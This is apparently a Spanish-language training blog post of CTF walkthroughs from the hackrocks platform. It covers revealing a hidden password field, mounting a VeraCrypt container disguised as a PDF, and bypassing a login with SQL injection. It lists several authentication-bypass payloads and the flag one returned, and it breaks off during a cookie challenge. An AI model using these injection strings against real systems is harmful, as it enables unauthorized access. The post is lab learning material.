{"id":23378,"date":"2026-04-10T15:24:02","date_gmt":"2026-04-10T21:24:02","guid":{"rendered":"https:\/\/sada.services\/?p=23378"},"modified":"2026-05-15T10:13:00","modified_gmt":"2026-05-15T16:13:00","slug":"training-hub-i-vulnerabilities-analyst-pd-wrl-007-funciones-basicas-de-evaluacion-y-gestion-de-la-vulnerabilidad-reto-guardar-contrasena","status":"publish","type":"post","link":"https:\/\/sada.services\/?p=23378","title":{"rendered":"Training Hub I: Vulnerabilities Analyst \u2013 PD-WRL-007 | Funciones B\u00e1sicas de Evaluaci\u00f3n y Gesti\u00f3n de la Vulnerabilidad | Evaluaci\u00f3n Inicial"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Reto: Guardar contrase\u00f1a<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Se accede al sitio web <\/li>\n\n\n\n<li><a href=\"https:\/\/challenges.hackrocks.com\/dont-save-me\">https:\/\/challenges.hackrocks.com\/dont-save-me<\/a><\/li>\n\n\n\n<li>y tiene una pagina html con una contrase\u00f1a oculta<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"573\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-45-1024x573.png\" alt=\"\" class=\"wp-image-23379\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-45-1024x573.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-45-300x168.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-45-768x430.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-45.png 1106w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Y para verla le damos ver c\u00f3digo fuente -&gt; pasar el campo de type=\u00bbpassword\u00bb a type=\u00bbtext\u00bb<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"460\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-46-1024x460.png\" alt=\"\" class=\"wp-image-23380\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-46-1024x460.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-46-300x135.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-46-768x345.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-46-1536x690.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-46.png 1724w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"537\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-47-1024x537.png\" alt=\"\" class=\"wp-image-23383\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-47-1024x537.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-47-300x157.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-47-768x403.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-47.png 1227w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">reto: Veracruz<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Hay que descargar los archivos<\/li>\n<\/ul>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-6fc39a52-2e5a-4a7e-9ddc-02bc39d55fdd\" href=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/files.zip\">files<\/a><a href=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/files.zip\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-6fc39a52-2e5a-4a7e-9ddc-02bc39d55fdd\">Descarga<\/a><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Archivos<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"845\" height=\"424\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-48.png\" alt=\"\" class=\"wp-image-23385\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-48.png 845w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-48-300x151.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-48-768x385.png 768w\" sizes=\"(max-width: 845px) 100vw, 845px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Paso 1 \u2014 Reconocimiento inicial<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code># Identificar el tipo real de cada archivo\nfile README.txt algarve.jpg portugal1.jpg contenedor.pdf<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Resultado<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>README.txt:     ASCII text\nalgarve.jpg:    JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: &#91;TIFF image data, big-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, datetime=2021:09:06 16:24:37], baseline, precision 8, 4800x2700, components 3\nportugal1.jpg:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 1920x1080, components 3\ncontenedor.pdf: data\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"133\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-50-1024x133.png\" alt=\"\" class=\"wp-image-23387\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-50-1024x133.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-50-300x39.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-50-768x100.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-50-1536x200.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-50.png 1909w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"has-palette-color-8-color has-vivid-red-background-color has-text-color has-background has-link-color wp-elements-8809b7ad95b7f76b61f02e4c8e643a18 wp-block-paragraph\"><strong>Hallazgo clave:<\/strong> <code>contenedor.pdf<\/code> devuelve <code>data<\/code> \u2014 NO es un PDF real.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ver los primeros bytes del impostor<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>xxd contenedor.pdf | head<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Resultado<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>00000000: bbd6 bbd6 30da f62f 73da 8452 0e43 7b10  ....0..\/s..R.C{.\n00000010: c698 e9b4 e651 386d bafa dd14 d8a0 9462  .....Q8m.......b\n00000020: 3617 8e6d bd9b 0551 bdc6 23cc 5ed3 0761  6..m...Q..#.^..a\n00000030: 46df 6d0c 6fd8 d727 d1bc 927c 5a60 89a9  F.m.o..'...|Z`..\n00000040: c4e2 5536 5c65 c396 ffb1 0eba 5a04 8a84  ..U6\\e......Z...\n00000050: 0bba 946d 5c52 3a0e 1de3 0354 cd2f 3795  ...m\\R:....T.\/7.\n00000060: bf27 73b2 2ef1 2552 f7f1 dd4f 8f49 11d3  .'s...%R...O.I..\n00000070: 45bb 133d 1ad4 5d01 86ce e6be d60e 85b1  E..=..].........\n00000080: a704 e355 d137 4571 453f 69bd 1eda 90a4  ...U.7EqE?i.....\n00000090: 9936 521c 5294 6ff5 16a5 baab 4a5d 09f7  .6R.R.o.....J]..\n<\/code><\/pre>\n\n\n\n<p class=\"has-palette-color-8-color has-vivid-red-background-color has-text-color has-background has-link-color wp-elements-ed469b02d53dd463d8e9f624b50a0c91 wp-block-paragraph\"><strong>Hallazgo:<\/strong> No tiene magic bytes de PDF (<code>%PDF<\/code>). Es binario cifrado de alta entrop\u00eda.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Todo archivo tiene una <strong>\u00abfirma\u00bb<\/strong> \u2014 los primeros bytes que identifican su formato. Es como el DNI del archivo, independientemente de su extensi\u00f3n.<br><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"795\" height=\"311\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-51.png\" alt=\"\" class=\"wp-image-23388\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-51.png 795w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-51-300x117.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-51-768x300.png 768w\" sizes=\"(max-width: 795px) 100vw, 795px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Cuando haces <code>file contenedor.pdf<\/code>, el sistema no mira la extensi\u00f3n \u2014 <strong>lee los primeros bytes<\/strong> y los compara contra una base de datos de firmas. Por eso devolvi\u00f3 <code>data<\/code> en lugar de <code>PDF document<\/code><\/li>\n\n\n\n<li>Verificar tama\u00f1o exacto<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">AGDDesa<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"617\" height=\"89\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-52.png\" alt=\"\" class=\"wp-image-23389\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-52.png 617w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-52-300x43.png 300w\" sizes=\"(max-width: 617px) 100vw, 617px\" \/><\/figure>\n\n\n\n<p class=\"has-palette-color-8-color has-vivid-red-background-color has-text-color has-background has-link-color wp-elements-1b7a62174e89ab62b5fa1dcef78b03a8 wp-block-paragraph\"><strong>Hallazgo:<\/strong> Exactamente <strong>2 MB (2097152 bytes)<\/strong> \u2014 m\u00faltiplo perfecto de 512 y 4096, caracter\u00edstico de contenedores cifrados.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Paso 2 \u2014 Analizar los metadatos de las im\u00e1genes<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>exiftool algarve.jpg<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Resultado<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>ExifTool Version Number         : 12.76\nFile Name                       : algarve.jpg\nDirectory                       : .\nFile Size                       : 4.0 MB\nFile Modification Date\/Time     : 2022:11:08 10:01:03-06:00\nFile Access Date\/Time           : 2026:04:10 16:49:08-06:00\nFile Inode Change Date\/Time     : 2026:04:10 16:48:50-06:00\nFile Permissions                : -rw-rw-r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nExif Byte Order                 : Big-endian (Motorola, MM)\nX Resolution                    : 300\nY Resolution                    : 300\nResolution Unit                 : inches\nModify Date                     : 2021:09:06 16:24:37\nColor Space                     : sRGB\nExif Image Width                : 4800\nExif Image Height               : 2700\nXMP Toolkit                     : XMP Core 5.5.0\nColor Mode                      : RGB\nICC Profile Name                : sRGB IEC61966-2.1\nMetadata Date                   : 2021:09:06 16:24:37+01:00\nHistory Action                  : produced\nHistory Software Agent          : Affinity Photo (Feb  1 2021)\nHistory When                    : 2021:09:06 16:24:37+01:00\nIPTC Digest                     : d41d8cd98f00b204e9800998ecf8427e\nProfile CMM Type                : Little CMS\nProfile Version                 : 4.3.0\nProfile Class                   : Display Device Profile\nColor Space Data                : RGB\nProfile Connection Space        : XYZ\nProfile Date Time               : 2021:09:06 09:01:58\nProfile File Signature          : acsp\nPrimary Platform                : Apple Computer Inc.\nCMM Flags                       : Not Embedded, Independent\nDevice Manufacturer             : \nDevice Model                    : \nDevice Attributes               : Reflective, Glossy, Positive, Color\nRendering Intent                : Perceptual\nConnection Space Illuminant     : 0.9642 1 0.82491\nProfile Creator                 : Little CMS\nProfile ID                      : 0\nProfile Description             : sRGB IEC61966-2.1\nProfile Copyright               : No copyright, use freely\nMedia White Point               : 0.9642 1 0.82491\nChromatic Adaptation            : 1.04788 0.02292 -0.05022 0.02959 0.99048 -0.01707 -0.00925 0.01508 0.75168\nRed Matrix Column               : 0.43604 0.22249 0.01392\nBlue Matrix Column              : 0.14305 0.06061 0.71391\nGreen Matrix Column             : 0.38512 0.7169 0.09706\nRed Tone Reproduction Curve     : (Binary data 32 bytes, use -b option to extract)\nGreen Tone Reproduction Curve   : (Binary data 32 bytes, use -b option to extract)\nBlue Tone Reproduction Curve    : (Binary data 32 bytes, use -b option to extract)\nChromaticity Channels           : 3\nChromaticity Colorant           : Unknown\nChromaticity Channel 1          : 0.64 0.33\nChromaticity Channel 2          : 0.3 0.60001\nChromaticity Channel 3          : 0.14999 0.06\nImage Width                     : 4800\nImage Height                    : 2700\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)\nImage Size                      : 4800x2700\nMegapixels                      : 13.0\n<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>el otro<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>exiftool portugal1.jpg<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Resultado<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>ExifTool Version Number         : 12.76\nFile Name                       : portugal1.jpg\nDirectory                       : .\nFile Size                       : 389 kB\nFile Modification Date\/Time     : 2022:11:08 10:02:03-06:00\nFile Access Date\/Time           : 2026:04:10 16:49:08-06:00\nFile Inode Change Date\/Time     : 2026:04:10 16:48:50-06:00\nFile Permissions                : -rw-rw-r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : inches\nX Resolution                    : 96\nY Resolution                    : 96\nImage Width                     : 1920\nImage Height                    : 1080\nEncoding Process                : Progressive DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 1920x1080\nMegapixels                      : 2.1AGDDesa<\/code><\/pre>\n\n\n\n<p class=\"has-palette-color-8-color has-vivid-red-background-color has-text-color has-background has-link-color wp-elements-5b87edbca80278abb2be64811059cdef wp-block-paragraph\"><strong>Hallazgo:<\/strong> Las im\u00e1genes son JPEGs v\u00e1lidos sin metadatos sospechoso<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Paso 3 \u2014 Leer el README con atenci\u00f3n<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Contenido<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>Hi there,\n\nThis PDF is the receipt for the encryptor we bought in Saimazoon.<\/code><\/pre>\n\n\n\n<p class=\"has-palette-color-8-color has-vivid-red-background-color has-text-color has-background has-link-color wp-elements-22f49a666f57cdd752638dbc017a43a9 wp-block-paragraph\">La palabra <strong><code>Saimazoon<\/code><\/strong> es tanto el nombre de la tienda ficticia <strong>como la contrase\u00f1a<\/strong>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Paso 4 \u2014 Identificar el contenedor como VeraCrypt<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 -c \"\ndata = open('contenedor.pdf','rb').read()\nprint('Tama\u00f1o:', len(data))\nprint('M\u00faltiplo de 512:', len(data) % 512 == 0)\nprint('M\u00faltiplo de 4096:', len(data) % 4096 == 0)\n\"<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Comentado<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 -c \"\n# Leer el archivo completo en modo binario ('rb' = read binary)\n# Esto carga todos los bytes del archivo en la variable 'data'\ndata = open('contenedor.pdf', 'rb').read()\n\n# Mostrar el tama\u00f1o total en bytes\n# Un volumen VeraCrypt siempre tiene un tama\u00f1o exacto, no aleatorio\nprint('Tama\u00f1o:', len(data))\n\n# Comprobar si el tama\u00f1o es m\u00faltiplo de 512 bytes\n# 512 bytes = tama\u00f1o de un sector de disco duro tradicional\n# VeraCrypt trabaja sector a sector, por eso el tama\u00f1o SIEMPRE es m\u00faltiplo de 512\n# El operador % devuelve el resto de la divisi\u00f3n:\n#   2097152 % 512 = 0  \u2192 es m\u00faltiplo exacto \u2713\n#   2097153 % 512 = 1  \u2192 NO ser\u00eda m\u00faltiplo \u2717\nprint('M\u00faltiplo de 512:', len(data) % 512 == 0)\n\n# Comprobar si tambi\u00e9n es m\u00faltiplo de 4096 bytes\n# 4096 bytes = tama\u00f1o de un sector en discos modernos (Advanced Format)\n# y tambi\u00e9n el tama\u00f1o de p\u00e1gina de memoria en sistemas Linux\/Windows\n# Si es m\u00faltiplo de ambos (512 y 4096), refuerza la sospecha de contenedor cifrado\nprint('M\u00faltiplo de 4096:', len(data) % 4096 == 0)\n\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Salida esperada:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Tama\u00f1o: 2097152\nM\u00faltiplo de 512: True\nM\u00faltiplo de 4096: True<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u00bfPor qu\u00e9 esto apunta a VeraCrypt?<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>2097152 bytes\n      \u2502\n      \u251c\u2500\u2500 \u00f7 512   = 4096 sectores exactos   \u2713\n      \u251c\u2500\u2500 \u00f7 4096  = 512 bloques exactos      \u2713\n      \u2514\u2500\u2500 \u00f7 1024  = 2048 KB = 2 MB exactos  \u2713\n\nUn archivo PDF o cualquier archivo normal\nraramente termina en un m\u00faltiplo tan redondo.\nVeraCrypt SIEMPRE lo hace porque reserva\nespacio en bloques completos de disco.<\/code><\/pre>\n\n\n\n<p class=\"has-palette-color-8-color has-vivid-red-background-color has-text-color has-background has-link-color wp-elements-a15d7443400726ae204a5c82e5dc2369 wp-block-paragraph\"><strong>Hallazgo:<\/strong> M\u00faltiplo perfecto \u2192 estructura de volumen cifrado.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Paso 5 \u2014 Instalar VeraCrypt<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Verificar versi\u00f3n de Ubuntu\nlsb_release -a\n\n# Instalar dependencias\nsudo apt install -y libfuse2 pcscd\n\n# Descargar VeraCrypt para Ubuntu 24.04\nwget https:\/\/launchpad.net\/veracrypt\/trunk\/1.26.7\/+download\/veracrypt-console-1.26.7-Ubuntu-24.04-amd64.deb\n\n# Instalar\nsudo dpkg -i veracrypt-console-1.26.7-Ubuntu-24.04-amd64.deb\n\n# Verificar\nveracrypt --version<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Paso 6 \u2014 Montar el contenedor VeraCrypt<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Crear punto de montaje\nsudo mkdir -p \/mnt\/vc\n\n# Montar con la contrase\u00f1a + keyfile correctos\nsudo veracrypt --text --mount contenedor.pdf \/mnt\/vc \\\n    --password=\"Saimazoon\" \\\n    --pim=0 \\\n    --keyfiles=\"algarve.jpg\" \\\n    --protect-hidden=no \\\n    --non-interactive<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Paso 7 \u2014 Obtener el token<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Ver contenido del volumen montado\nls -la \/mnt\/vc\/\n\n# Leer el token\ncat \/mnt\/vc\/*<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Desmontar cuando termines<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code># Desmontar cuando termines\nsudo veracrypt --text --dismount \/mnt\/vc<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"772\" height=\"343\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-53.png\" alt=\"\" class=\"wp-image-23390\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-53.png 772w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-53-300x133.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-53-768x341.png 768w\" sizes=\"(max-width: 772px) 100vw, 772px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"788\" height=\"171\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-54.png\" alt=\"\" class=\"wp-image-23391\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-54.png 788w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-54-300x65.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-54-768x167.png 768w\" sizes=\"(max-width: 788px) 100vw, 788px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1006\" height=\"548\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-49.png\" alt=\"\" class=\"wp-image-23386\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-49.png 1006w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-49-300x163.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-49-768x418.png 768w\" sizes=\"(max-width: 1006px) 100vw, 1006px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">RETO: Acceso Denegado SQ inyection<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>l Consorcio<\/strong>&nbsp;controla un sistema de acceso que se cree impenetrable. Se supone que nadie puede entrar sin las credenciales correctas. Pero t\u00fa eres un hacker, y sabes que no hay sistema que sea realmente inexpugnable.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El reto est\u00e1 frente a ti. Un simple formulario de login. \u00bfPodr\u00e1s encontrar la forma de eludir las protecciones y acceder a los datos ocultos?&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><em>El formato del token es&nbsp;<strong>H&#8230;.C<\/strong><\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em><strong>NOTA<\/strong>: Ninguna otra url forma parte del reto.<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Para acceder al reto, haz click en el siguiente enlace:&nbsp;<a target=\"_blank\" rel=\"noreferrer noopener\" href=\"https:\/\/challenges.hackrocks.com\/system-access\">https:\/\/challenges.hackrocks.com\/system-access<\/a><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Nos abrio la paigina<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"846\" height=\"573\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-623.png\" alt=\"\" class=\"wp-image-24258\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-623.png 846w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-623-300x203.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-623-768x520.png 768w\" sizes=\"(max-width: 846px) 100vw, 846px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Probamos<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>' OR '1'='1\n' OR '1'='1'-- \n' OR 1=1-- \nadmin'-- \nadmin' #\n' OR '1'='1'#\n\") OR (\"1\"=\"1\n') OR ('1'='1'--<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Este sirvio<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>' OR '1'='1'-- <\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>respuesta<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>Welcome ' OR '1'='1'-- ! Flag: H4345345C<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"727\" height=\"296\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-621.png\" alt=\"\" class=\"wp-image-24256\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-621.png 727w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-621-300x122.png 300w\" sizes=\"(max-width: 727px) 100vw, 727px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"963\" height=\"840\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-622.png\" alt=\"\" class=\"wp-image-24257\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-622.png 963w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-622-300x262.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-622-768x670.png 768w\" sizes=\"(max-width: 963px) 100vw, 963px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">RETO: Bad cookie<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">Resumen<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">No se lo digas a nadie, pero el grupo recibi\u00f3 recientemente el encargo de resolver y explotar una web en desarrollo de&nbsp;Plainsight, y la rechazamos porque era demasiado f\u00e1cil de explotar. Sin embargo, el nuevo becario perdi\u00f3 el informe y ahora nadie recuerda qu\u00e9 problemas se encontraron.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00bfPuedes averiguar por qu\u00e9 fue rechazada?<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Accede a la web que nos proporcionaron y ay\u00fadanos a volver a redactar el informe.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><em>El formato del token es&nbsp;<strong>flag{..}<\/strong><\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Para acceder al reto, haz click en el siguiente enlace:&nbsp;<a target=\"_blank\" rel=\"noreferrer noopener\" href=\"https:\/\/challenges.hackrocks.com\/bad-cookie\/\">https:\/\/challenges.hackrocks.com\/bad-cookie\/<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solucion<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ingresamos a la pagina <\/li>\n\n\n\n<li><a href=\"https:\/\/challenges.hackrocks.com\/bad-cookie\/\">https:\/\/challenges.hackrocks.com\/bad-cookie\/<\/a><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"329\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-624-1024x329.png\" alt=\"\" class=\"wp-image-24260\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-624-1024x329.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-624-300x97.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-624-768x247.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-624-1536x494.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-624.png 1554w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Si intentamos ingresar a admin<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"244\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-625-1024x244.png\" alt=\"\" class=\"wp-image-24261\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-625-1024x244.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-625-300x71.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-625-768x183.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-625-1536x365.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-625.png 1896w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Da error<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"532\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-626-1024x532.png\" alt=\"\" class=\"wp-image-24262\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-626-1024x532.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-626-300x156.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-626-768x399.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-626.png 1523w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Si 